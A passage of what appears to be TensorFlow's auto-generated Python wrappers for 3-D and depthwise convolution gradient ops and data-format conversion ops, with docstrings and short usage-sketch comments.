_attrs = ("T", _attr_T, "strides", strides, "padding", padding, "dilations",
dilations)
_result = _execute.execute(b"Conv3DBackpropInput", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv3DBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def conv3d_backprop_input_v2(input_sizes, filter, out_backprop, strides, padding, data_format="NDHWC", dilations=[1, 1, 1, 1, 1], name=None):
r"""Computes the gradients of 3-D convolution with respect to the input.
Args:
input_sizes: A `Tensor`. Must be one of the following types: `int32`, `int64`.
An integer vector representing the tensor shape of `input`,
where `input` is a 5-D
`[batch, depth, rows, cols, in_channels]` tensor.
filter: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
Shape `[depth, rows, cols, in_channels, out_channels]`.
`in_channels` must match between `input` and `filter`.
out_backprop: A `Tensor`. Must have the same type as `filter`.
Backprop signal of shape `[batch, out_depth, out_rows, out_cols,
out_channels]`.
strides: A list of `ints` that has length `>= 5`.
1-D tensor of length 5. The stride of the sliding window for each
dimension of `input`. Must have `strides[0] = strides[4] = 1`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: An optional `string` from: `"NDHWC", "NCDHW"`. Defaults to `"NDHWC"`.
The data format of the input and output data. With the
default format "NDHWC", the data is stored in the order of:
[batch, in_depth, in_height, in_width, in_channels].
Alternatively, the format could be "NCDHW", the data storage order is:
[batch, in_channels, in_depth, in_height, in_width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1, 1]`.
1-D tensor of length 5. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each
filter element on that dimension. The dimension order is determined by the
value of `data_format`, see above for details. Dilations in the batch and
depth dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `filter`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "Conv3DBackpropInputV2", name, input_sizes, filter,
out_backprop, "strides", strides, "padding", padding, "data_format",
data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return conv3d_backprop_input_v2_eager_fallback(
input_sizes, filter, out_backprop, strides=strides, padding=padding,
data_format=data_format, dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
      pass
  # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_input_v2' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_input_v2' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"Conv3DBackpropInputV2", input_sizes=input_sizes, filter=filter,
out_backprop=out_backprop, strides=strides,
padding=padding, data_format=data_format,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"), "Tshape",
_op._get_attr_type("Tshape"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"Conv3DBackpropInputV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
Conv3DBackpropInputV2 = tf_export("raw_ops.Conv3DBackpropInputV2")(_ops.to_raw_op(conv3d_backprop_input_v2))
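# Editorial usage sketch: the V2 input-gradient op takes `input_sizes`
# (int32 or int64). Shapes are assumptions.
#
#   filt = tf.random.normal([3, 3, 3, 2, 4])
#   grad_y = tf.random.normal([1, 8, 8, 8, 4])
#   grad_x = tf.raw_ops.Conv3DBackpropInputV2(
#       input_sizes=[1, 8, 8, 8, 2], filter=filt, out_backprop=grad_y,
#       strides=[1, 1, 1, 1, 1], padding="SAME")
#   assert grad_x.shape == (1, 8, 8, 8, 2)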
def conv3d_backprop_input_v2_eager_fallback(input_sizes, filter, out_backprop, strides, padding, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'conv3d_backprop_input_v2' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if data_format is None:
data_format = "NDHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'conv3d_backprop_input_v2' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([filter, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(filter, out_backprop) = _inputs_T
_attr_Tshape, (input_sizes,) = _execute.args_to_matching_eager([input_sizes], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int32)
_inputs_flat = [input_sizes, filter, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"data_format", data_format, "dilations", dilations, "Tshape", _attr_Tshape)
_result = _execute.execute(b"Conv3DBackpropInputV2", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"Conv3DBackpropInputV2", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def data_format_dim_map(x, src_format="NHWC", dst_format="NCHW", name=None):
r"""Returns the dimension index in the destination data format given the one in
the source data format.
Args:
x: A `Tensor`. Must be one of the following types: `int32`, `int64`.
A Tensor with each element as a dimension index in source data format.
Must be in the range [-4, 4).
src_format: An optional `string`. Defaults to `"NHWC"`.
source data format.
dst_format: An optional `string`. Defaults to `"NCHW"`.
destination data format.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "DataFormatDimMap", name, x, "src_format", src_format,
"dst_format", dst_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return data_format_dim_map_eager_fallback(
x, src_format=src_format, dst_format=dst_format, name=name,
ctx=_ctx)
except _core._SymbolicException:
      pass
  # Add nodes to the TensorFlow graph.
if src_format is None:
src_format = "NHWC"
src_format = _execute.make_str(src_format, "src_format")
if dst_format is None:
dst_format = "NCHW"
dst_format = _execute.make_str(dst_format, "dst_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"DataFormatDimMap", x=x, src_format=src_format, dst_format=dst_format,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "src_format",
_op.get_attr("src_format"), "dst_format",
_op.get_attr("dst_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"DataFormatDimMap", _inputs_flat, _attrs, _result)
_result, = _result
return _result
DataFormatDimMap = tf_export("raw_ops.DataFormatDimMap")(_ops.to_raw_op(data_format_dim_map))
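# Editorial usage sketch: mapping dimension indices between layouts. In NHWC
# the axes (N, H, W, C) sit at positions (0, 2, 3, 1) of NCHW, which is what
# the op returns for the identity index vector.
#
#   idx = tf.raw_ops.DataFormatDimMap(x=[0, 1, 2, 3],
#                                     src_format="NHWC", dst_format="NCHW")
#   # idx == [0, 2, 3, 1]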
def data_format_dim_map_eager_fallback(x, src_format, dst_format, name, ctx):
if src_format is None:
src_format = "NHWC"
src_format = _execute.make_str(src_format, "src_format")
if dst_format is None:
dst_format = "NCHW"
dst_format = _execute.make_str(dst_format, "dst_format")
_attr_T, (x,) = _execute.args_to_matching_eager([x], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int32)
_inputs_flat = [x]
_attrs = ("T", _attr_T, "src_format", src_format, "dst_format", dst_format)
_result = _execute.execute(b"DataFormatDimMap", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"DataFormatDimMap", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def data_format_vec_permute(x, src_format="NHWC", dst_format="NCHW", name=None):
r"""Permute input tensor from `src_format` to `dst_format`.
Input tensor must be a vector of size 4, or a 4x2 tensor.
For example, with `src_format` of `NHWC`, `dst_format` of `NCHW`, and inputs:
```
[1, 2, 3, 4]
```
and
```
[[1, 2, 3, 4],
[5, 6, 7, 8]]
```
  the outputs will be (respectively):
```
[1, 4, 2, 3]
```
and
```
[[1, 4, 2, 3],
[5, 8, 6, 7]]
```
Args:
x: A `Tensor`. Must be one of the following types: `int32`, `int64`.
Vector of size 4 or Tensor of shape (4, 2) in source data format.
src_format: An optional `string`. Defaults to `"NHWC"`.
source data format.
dst_format: An optional `string`. Defaults to `"NCHW"`.
destination data format.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `x`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "DataFormatVecPermute", name, x, "src_format", src_format,
"dst_format", dst_format)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return data_format_vec_permute_eager_fallback(
x, src_format=src_format, dst_format=dst_format, name=name,
ctx=_ctx)
except _core._SymbolicException:
      pass
  # Add nodes to the TensorFlow graph.
if src_format is None:
src_format = "NHWC"
src_format = _execute.make_str(src_format, "src_format")
if dst_format is None:
dst_format = "NCHW"
dst_format = _execute.make_str(dst_format, "dst_format")
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"DataFormatVecPermute", x=x, src_format=src_format,
dst_format=dst_format, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "src_format",
_op.get_attr("src_format"), "dst_format",
_op.get_attr("dst_format"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"DataFormatVecPermute", _inputs_flat, _attrs, _result)
_result, = _result
return _result
DataFormatVecPermute = tf_export("raw_ops.DataFormatVecPermute")(_ops.to_raw_op(data_format_vec_permute))
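# Editorial usage sketch: permuting a shape vector from NHWC to NCHW order,
# mirroring the docstring example above. The concrete shape is an assumption.
#
#   shape_nhwc = [1, 224, 224, 3]
#   shape_nchw = tf.raw_ops.DataFormatVecPermute(
#       x=shape_nhwc, src_format="NHWC", dst_format="NCHW")
#   # shape_nchw == [1, 3, 224, 224]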
def data_format_vec_permute_eager_fallback(x, src_format, dst_format, name, ctx):
if src_format is None:
src_format = "NHWC"
src_format = _execute.make_str(src_format, "src_format")
if dst_format is None:
dst_format = "NCHW"
dst_format = _execute.make_str(dst_format, "dst_format")
_attr_T, (x,) = _execute.args_to_matching_eager([x], ctx, [_dtypes.int32, _dtypes.int64, ], _dtypes.int32)
_inputs_flat = [x]
_attrs = ("T", _attr_T, "src_format", src_format, "dst_format", dst_format)
_result = _execute.execute(b"DataFormatVecPermute", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"DataFormatVecPermute", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def depthwise_conv2d_native(input, filter, strides, padding, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes a 2-D depthwise convolution given 4-D `input` and `filter` tensors.
Given an input tensor of shape `[batch, in_height, in_width, in_channels]`
and a filter / kernel tensor of shape
`[filter_height, filter_width, in_channels, channel_multiplier]`, containing
`in_channels` convolutional filters of depth 1, `depthwise_conv2d` applies
a different filter to each input channel (expanding from 1 channel to
`channel_multiplier` channels for each), then concatenates the results
together. Thus, the output has `in_channels * channel_multiplier` channels.
```
for k in 0..in_channels-1
for q in 0..channel_multiplier-1
output[b, i, j, k * channel_multiplier + q] =
sum_{di, dj} input[b, strides[1] * i + di, strides[2] * j + dj, k] *
filter[di, dj, k, q]
```
Must have `strides[0] = strides[3] = 1`. For the most common case of the same
  horizontal and vertical strides, `strides = [1, stride, stride, 1]`.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
filter: A `Tensor`. Must have the same type as `input`.
strides: A list of `ints`.
1-D of length 4. The stride of the sliding window for each dimension
of `input`.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, height, width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each filter
element on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "DepthwiseConv2dNative", name, input, filter, "strides",
strides, "padding", padding, "explicit_paddings", explicit_paddings,
"data_format", data_format, "dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return depthwise_conv2d_native_eager_fallback(
input, filter, strides=strides, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
      pass
  # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"DepthwiseConv2dNative", input=input, filter=filter, strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format, dilations=dilations,
name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"explicit_paddings", _op.get_attr("explicit_paddings"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"DepthwiseConv2dNative", _inputs_flat, _attrs, _result)
_result, = _result
return _result
DepthwiseConv2dNative = tf_export("raw_ops.DepthwiseConv2dNative")(_ops.to_raw_op(depthwise_conv2d_native))
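# Editorial usage sketch: a depthwise convolution in which each of the 3 input
# channels gets its own pair of 3x3 filters (channel_multiplier = 2), so the
# output carries 3 * 2 = 6 channels. Shapes are assumptions.
#
#   x = tf.random.normal([1, 8, 8, 3])
#   filt = tf.random.normal([3, 3, 3, 2])     # [fh, fw, in_c, multiplier]
#   y = tf.raw_ops.DepthwiseConv2dNative(input=x, filter=filt,
#                                        strides=[1, 1, 1, 1], padding="SAME")
#   assert y.shape == (1, 8, 8, 6)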
def depthwise_conv2d_native_eager_fallback(input, filter, strides, padding, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, filter], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(input, filter) = _inputs_T
_inputs_flat = [input, filter]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
_result = _execute.execute(b"DepthwiseConv2dNative", 1, inputs=_inputs_flat,
attrs=_attrs, ctx=ctx, name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"DepthwiseConv2dNative", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def depthwise_conv2d_native_backprop_filter(input, filter_sizes, out_backprop, strides, padding, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes the gradients of depthwise convolution with respect to the filter.
Args:
input: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
4-D with shape based on `data_format`. For example, if
`data_format` is 'NHWC' then `input` is a 4-D `[batch, in_height,
in_width, in_channels]` tensor.
filter_sizes: A `Tensor` of type `int32`.
An integer vector representing the tensor shape of `filter`,
where `filter` is a 4-D
`[filter_height, filter_width, in_channels, depthwise_multiplier]` tensor.
out_backprop: A `Tensor`. Must have the same type as `input`.
4-D with shape based on `data_format`.
For example, if `data_format` is 'NHWC' then
out_backprop shape is `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
of the convolution.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, height, width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each filter
element on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "DepthwiseConv2dNativeBackpropFilter", name, input,
filter_sizes, out_backprop, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return depthwise_conv2d_native_backprop_filter_eager_fallback(
input, filter_sizes, out_backprop, strides=strides, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
      pass
  # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"DepthwiseConv2dNativeBackpropFilter", input=input,
filter_sizes=filter_sizes,
out_backprop=out_backprop,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"explicit_paddings", _op.get_attr("explicit_paddings"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"DepthwiseConv2dNativeBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
DepthwiseConv2dNativeBackpropFilter = tf_export("raw_ops.DepthwiseConv2dNativeBackpropFilter")(_ops.to_raw_op(depthwise_conv2d_native_backprop_filter))
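# Editorial usage sketch: filter gradient of the assumed depthwise convolution
# above; `out_backprop` carries in_channels * channel_multiplier channels.
#
#   x = tf.random.normal([1, 8, 8, 3])
#   grad_y = tf.random.normal([1, 8, 8, 6])
#   grad_w = tf.raw_ops.DepthwiseConv2dNativeBackpropFilter(
#       input=x, filter_sizes=[3, 3, 3, 2], out_backprop=grad_y,
#       strides=[1, 1, 1, 1], padding="SAME")
#   assert grad_w.shape == (3, 3, 3, 2)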
def depthwise_conv2d_native_backprop_filter_eager_fallback(input, filter_sizes, out_backprop, strides, padding, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native_backprop_filter' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_attr_T, _inputs_T = _execute.args_to_matching_eager([input, out_backprop], ctx, [_dtypes.half, _dtypes.bfloat16, _dtypes.float32, _dtypes.float64, ])
(input, out_backprop) = _inputs_T
filter_sizes = _ops.convert_to_tensor(filter_sizes, _dtypes.int32)
_inputs_flat = [input, filter_sizes, out_backprop]
_attrs = ("T", _attr_T, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
_result = _execute.execute(b"DepthwiseConv2dNativeBackpropFilter", 1,
inputs=_inputs_flat, attrs=_attrs, ctx=ctx,
name=name)
if _execute.must_record_gradient():
_execute.record_gradient(
"DepthwiseConv2dNativeBackpropFilter", _inputs_flat, _attrs, _result)
_result, = _result
return _result
def depthwise_conv2d_native_backprop_input(input_sizes, filter, out_backprop, strides, padding, explicit_paddings=[], data_format="NHWC", dilations=[1, 1, 1, 1], name=None):
r"""Computes the gradients of depthwise convolution with respect to the input.
Args:
input_sizes: A `Tensor` of type `int32`.
An integer vector representing the shape of `input`, based
on `data_format`. For example, if `data_format` is 'NHWC' then
`input` is a 4-D `[batch, height, width, channels]` tensor.
filter: A `Tensor`. Must be one of the following types: `half`, `bfloat16`, `float32`, `float64`.
4-D with shape
`[filter_height, filter_width, in_channels, depthwise_multiplier]`.
out_backprop: A `Tensor`. Must have the same type as `filter`.
4-D with shape based on `data_format`.
For example, if `data_format` is 'NHWC' then
out_backprop shape is `[batch, out_height, out_width, out_channels]`.
Gradients w.r.t. the output of the convolution.
strides: A list of `ints`.
The stride of the sliding window for each dimension of the input
of the convolution.
padding: A `string` from: `"SAME", "VALID", "EXPLICIT"`.
The type of padding algorithm to use.
explicit_paddings: An optional list of `ints`. Defaults to `[]`.
data_format: An optional `string` from: `"NHWC", "NCHW"`. Defaults to `"NHWC"`.
Specify the data format of the input and output data. With the
default format "NHWC", the data is stored in the order of:
[batch, height, width, channels].
Alternatively, the format could be "NCHW", the data storage order of:
[batch, channels, height, width].
dilations: An optional list of `ints`. Defaults to `[1, 1, 1, 1]`.
1-D tensor of length 4. The dilation factor for each dimension of
`input`. If set to k > 1, there will be k-1 skipped cells between each filter
element on that dimension. The dimension order is determined by the value of
`data_format`, see above for details. Dilations in the batch and depth
dimensions must be 1.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `filter`.
"""
_ctx = _context._context or _context.context()
tld = _ctx._thread_local_data
if tld.is_eager:
try:
_result = pywrap_tfe.TFE_Py_FastPathExecute(
_ctx, "DepthwiseConv2dNativeBackpropInput", name, input_sizes, filter,
out_backprop, "strides", strides, "padding", padding,
"explicit_paddings", explicit_paddings, "data_format", data_format,
"dilations", dilations)
return _result
except _core._NotOkStatusException as e:
_ops.raise_from_not_ok_status(e, name)
except _core._FallbackException:
pass
try:
return depthwise_conv2d_native_backprop_input_eager_fallback(
input_sizes, filter, out_backprop, strides=strides, padding=padding,
explicit_paddings=explicit_paddings, data_format=data_format,
dilations=dilations, name=name, ctx=_ctx)
except _core._SymbolicException:
      pass
  # Add nodes to the TensorFlow graph.
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
_, _, _op, _outputs = _op_def_library._apply_op_helper(
"DepthwiseConv2dNativeBackpropInput", input_sizes=input_sizes,
filter=filter,
out_backprop=out_backprop,
strides=strides,
padding=padding,
explicit_paddings=explicit_paddings,
data_format=data_format,
dilations=dilations, name=name)
_result = _outputs[:]
if _execute.must_record_gradient():
_attrs = ("T", _op._get_attr_type("T"), "strides",
_op.get_attr("strides"), "padding", _op.get_attr("padding"),
"explicit_paddings", _op.get_attr("explicit_paddings"),
"data_format", _op.get_attr("data_format"), "dilations",
_op.get_attr("dilations"))
_inputs_flat = _op.inputs
_execute.record_gradient(
"DepthwiseConv2dNativeBackpropInput", _inputs_flat, _attrs, _result)
_result, = _result
return _result
DepthwiseConv2dNativeBackpropInput = tf_export("raw_ops.DepthwiseConv2dNativeBackpropInput")(_ops.to_raw_op(depthwise_conv2d_native_backprop_input))
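# Editorial usage sketch: input gradient of the same assumed depthwise
# convolution.
#
#   filt = tf.random.normal([3, 3, 3, 2])
#   grad_y = tf.random.normal([1, 8, 8, 6])
#   grad_x = tf.raw_ops.DepthwiseConv2dNativeBackpropInput(
#       input_sizes=[1, 8, 8, 3], filter=filt, out_backprop=grad_y,
#       strides=[1, 1, 1, 1], padding="SAME")
#   assert grad_x.shape == (1, 8, 8, 3)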
def depthwise_conv2d_native_backprop_input_eager_fallback(input_sizes, filter, out_backprop, strides, padding, explicit_paddings, data_format, dilations, name, ctx):
if not isinstance(strides, (list, tuple)):
raise TypeError(
"Expected list for 'strides' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % strides)
strides = [_execute.make_int(_i, "strides") for _i in strides]
padding = _execute.make_str(padding, "padding")
if explicit_paddings is None:
explicit_paddings = []
if not isinstance(explicit_paddings, (list, tuple)):
raise TypeError(
"Expected list for 'explicit_paddings' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % explicit_paddings)
explicit_paddings = [_execute.make_int(_i, "explicit_paddings") for _i in explicit_paddings]
if data_format is None:
data_format = "NHWC"
data_format = _execute.make_str(data_format, "data_format")
if dilations is None:
dilations = [1, 1, 1, 1]
if not isinstance(dilations, (list, tuple)):
raise TypeError(
"Expected list for 'dilations' argument to "
"'depthwise_conv2d_native_backprop_input' Op, not %r." % dilations)
dilations = [_execute.make_int(_i, "dilations") for _i in dilations]
